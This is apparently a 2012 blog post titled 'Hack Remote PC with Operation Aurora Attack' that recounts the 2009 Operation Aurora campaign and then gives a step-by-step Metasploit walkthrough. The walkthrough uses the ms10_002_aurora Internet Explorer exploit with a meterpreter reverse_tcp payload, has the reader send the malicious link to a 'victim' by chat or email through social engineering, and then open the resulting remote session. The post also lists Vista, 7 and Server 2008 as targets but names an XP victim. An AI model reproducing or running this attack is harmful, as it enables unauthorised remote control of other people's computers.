Saturday, September 29, 2012

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8

Operating System: Windows vista, windows 7, windows server 2008

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_002_aurora

Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)

Msf exploit (ms10_002_aurora)>exploit

Now an URL you should give to your victim http://192.168.1.4/meeting

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

No comments:

Post a Comment